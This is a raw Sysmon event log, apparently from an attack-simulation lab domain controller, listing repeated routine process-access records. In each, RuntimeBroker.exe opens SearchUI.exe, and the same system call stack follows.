12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.057{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 